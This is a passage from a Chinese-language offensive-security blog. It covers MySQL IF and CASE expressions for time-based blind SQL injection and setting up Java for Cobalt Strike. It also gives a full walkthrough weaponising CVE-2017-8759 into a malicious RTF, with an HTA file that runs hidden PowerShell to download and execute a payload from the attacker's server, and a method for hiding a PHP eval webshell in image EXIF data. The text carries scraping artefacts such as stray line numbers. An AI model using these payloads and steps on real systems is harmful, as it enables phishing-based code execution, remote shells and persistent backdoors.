m0nst3r's blog

[TOC]

利用场景

1. 一般为SQL盲注或时间注入在时候。
2. 逗号,没有被过滤的情况下。

   如果注入点过滤了逗号,，可用CASE表达式绕过，参考SQL注入中的CASE表达式

MySql中的IF表达式

定义参考

1. 官方参考：MYSQL IF表达式参考

2. 语法

   1	IF(expr1,expr2,expr3)

3. 关于返回值
   3.1 如果expr1不等于0，且expr1不等于NULL，则整个表达式的结果为expr2，否则为expr3。
   3.2 如果expr1，expr2中只有一个为NULL,则整个IF()表达式的返回值类型为那个非NULL表达式的类型。
   3.3 默认的返回值遵守以下规则：

   1 2 3 4

   如果`expr2`或者`expr3`会产生一个`string`，则返回值为`string`; 如果`expr2`和`expr3`都是`string`，且任何其中一个是大小写敏感的，则返回值也是大小写敏感的； 如果`expr3`或者`expr3`产生一个浮点类型的值，则结果为一个浮点类型的值； 如果`expr2`或者`expr3`会产生一个整数，则结果为一个整数。

##举例

mysql> select if(1<0,sleep(5),sleep(2)); 0 1 +---------------------------+ | if(1<0,sleep(5),sleep(2)) row in set (2.00 sec) < pre>

[TOC]

起因

在做CTF的时候，发现一个时间盲注，一时间忘记怎么手工，不能忍，果断搜索了一波。

作用

1. 盲注
2. 绕过过滤逗号,的注入点

MySql中的CASE表达式

定义参考

1. 先附上官方参考：MySQL CASE 表达式参考

2. CASE表达式的两种写法

   1 2	CASE value WHEN [compare_value] THEN result [WHEN [compare_value] THEN result ...] [ELSE result] END CASE WHEN [condition] THEN result [WHEN [condition] THEN result ...] [ELSE result] END

举例

1. 第一种语法

    mysql> select case 1 when 1 then 'one' end;
    +------------------------------+
    | case 1 when 1 then 'one' end |
    +------------------------------+
    | one                          |
    +------------------------------+
    1 row in set (0.04 sec)
   
    mysql> select case 1 when 1=1 then sleep(5) end;
    +-----------------------------------+
    | case 1 when 1=1 then sleep(5) end |
    +-----------------------------------+
    |                                 0 |
    +-----------------------------------+
    1 row in set (5.00 sec)
    
    mysql> select case 1 when 1=2 then sleep(5) when 1=1 then sleep(2) end;
    +----------------------------------------------------------+
    | case 1 when 1=2 then sleep(5) when 1=1 then sleep(2) end |
    +----------------------------------------------------------+
    |                                                        0 |
    +----------------------------------------------------------+
    1 row in set (2.00 sec)

[TOC]
##需求
Cobalt strike 用openjdk的话，不稳定，而且运行时候提示openjdk不推荐。

##更新步骤

1. 下载JDK1.7,这个版本是比较稳定的，对于cobalt strike来说。下载地址我找到过一次，后来在也找不到了，不知道为啥。JDK1.7百度网盘地址下载在后面。

2. 将下载的jdk1.7解压缩。

3. 在/usr/lib/jvm下新建jdk17，将解压出来的目录移动到该目录下。

4. 运行以下三条命令，安装JDK1.7：

   1 2 3

   update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk17/bin/java 1 update-alternatives --install /usr/bin/javac javac /usr/lib/jvm/jdk17/bin/javac 1 update-alternatives --install /usr/bin/jar jar /usr/lib/jvm/jdk17/bin/jar 1

5. 配置JDK1.7为默认java：

   1 2 3 4 5 6 7 8

   update-alternatives --config java There are 2 choices for the alternative java (providing /usr/bin/java). Selection Path Priority Status ------------------------------------------------------------ * 0 /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java 1081 auto mode 1 /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java 1081 manual mode 2 /usr/lib/jvm/jdk17/bin/java 1 manual mode

   选择2。完成。

##截图

##JDK1.7下载
JDK7 百度网盘

[TOC]

主要参考文章是来自Lz1y 大神的文章：http://www.lz1y.cn/wordpress/?p=799

更新记录：

最新修改与：2017年9月28日

##工具

1. https://github.com/Lz1y/CVE-2017-8759.git
2. Cobalt Strike（请自行下载）

##步骤

1. 在kali上面，执行命令
   git clone https://github.com/Lz1y/CVE-2017-8759.git
2. 进入cobalt strike目录，执行:
   ./teamserver 192.168.1.9 123456
3. 在cobalt strike目录，执行./cobaltstrike运行cobalt strike客户端。
4. 在cobalt strike中新建Listener，类型用http的，端口输入80。
5. 进入该目录，依次修改以下文档：
   5.1 gedit cmd.jpg (先cp cmd.hta cmd.jpg)

   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

   <html> <head> <script language="VBScript"> Sub window_onload window.resizeTo 0,0 window.MoveTo -100,-100 const impersonation = 3 Const HIDDEN_WINDOW = 12 Set Locator = CreateObject("WScript.Shell") Locator.Run"powershell.exe -nop -w hidden -c ""IEX (new-object net.webclient).downloadstring('http://192.168.1.9:80/a')""",0,FALSE window.close() end sub </script> <!-- <script language="VBScript"> Sub window_onload const impersonation = 3 Const HIDDEN_WINDOW = 12 Set Locator = CreateObject("WbemScripting.SWbemLocator") Set Service = Locator.ConnectServer() Service.Security_.ImpersonationLevel=impersonation Set objStartup = Service.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ Set Process = Service.Get("Win32_Process") Error = Process.Create("powershell.exe -nop -w hidden calc.exe", null, objConfig, intProcessID) window.close() end sub </script> --> </head> </html>

   
   5.2 gedit exploit.txt

   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

   <definitions xmlns="http://schemas.xmlsoap.org/wsdl/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:suds="http://www.w3.org/2000/wsdl/suds" xmlns:tns="http://schemas.microsoft.com/clr/ns/System" xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo"> <portType name="PortType"/> <binding name="Binding" type="tns:PortType"> <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/> <suds:class type="ns0:Image" rootType="MarshalByRefObject"></suds:class> </binding> <service name="Service"> <port name="Port" binding="tns:Binding"> <soap:address location="http://192.168.1.9?C:\Windows\System32\mshta.exe?http://192.168.1.9/cmd.jpg"/> <soap:address location="; if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null) { System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]); System.AppDomain.CurrentDomain.SetData(_url.Split('?')[0], true); } //"/> </port> </service> </definitions>

   
   ​ 以上两个文档的修改要与cobalt strike相对应
6. 设置攻击环境：
   6.1 Attacks -> Web Drive-by -> Scripted Web Delivery，启动一个powershell木马，设置如下图：
   
   点击”Launch”之后，会生成一个一句话的Powershell代码，记住其中的网址部分，填写到cmd.jpg中，替换掉url。
   6.2 Attacks -> Web Drive-by -> Host File，将cmd.jpg，一定要将Mime Type修改为application/hta，此处生成的URL请填入exploit.txt中相应的位置。
   6.3 Attacks -> Web Drive-by -> Host File，将exploit.txt，无需特殊设置，设置好Local URI，点击Launch，复制生成的URL。此URL为CreateRTF.py脚本-u参数使用的。
   6.3 使用大神的CreatRTF.py生成一个rtf文档，url填写为Host exploit.txt时产生的url。

至此，步骤完成，将生成的rtf文档发送给目标，即可在cobalt strike teamserver上得到shell。

##注意事项

[TOC]
##意义
常见WebShell比较容易识别，利用图片exif信息可以达到隐藏WebShell的目的，以便持久化。（当然，这不是持久化的最好方法，不过作为临时持久化方法还是可以试试的）

##工具

1. ExifTool
2. 一句话木马
3. 中国菜刀客户端
4. 图片

##步骤

1. 跟度娘要一张喜欢的图片
   略了

2. 安装ExifTool
   2.1 环境Kali
   2.2 命令：apt-get install exiftool

3. 向图片中写入一句话木马
   执行命令：
   exiftool "-comment=<test.php timg.jpg"
exiftool "-model=/.*/e" timg.jpg
   字符串：
   aWYgKGlzc2V0KCRfUE9TVFsiY21kIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjbWQiXSkpO30=
   Base64解码之后的东西，我就补贴出来了，总之密码是cmd
   执行结果如下：
   
   可以看到我们的一句话木马就写到了图片信息当中

4. 修改版一句话木马

   1 2 3 4

   <?php $exif = exif_read_data('/www/web/phpshell_google_com/public_html/timg.jpg'); preg_replace($exif[Model],$exif[Make],''); ?>

5. GetShell
   

注意事项

[1] 图片路径可以是绝对路径，也可以是相对路径，如果是相对路径不要忘记./符号哦
[2] 测试PHP版本为5.5.根据大牛提示，preg_replace函数的/e选项在>5.6版本中废除，不过也有别的函数替代。思路是对的，注意函数使用。
[3] 不要长时间盯着苍老师的图片看，图有魔性~~
##参考
[1] https://www.trustwave.com/Resources/SpiderLabs-Blog/Hiding-Webshell-Backdoor-Code-in-Image-Files/
[2] https://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html